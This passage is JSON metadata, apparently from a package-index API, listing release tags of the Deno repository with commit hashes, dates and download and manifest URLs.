:"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.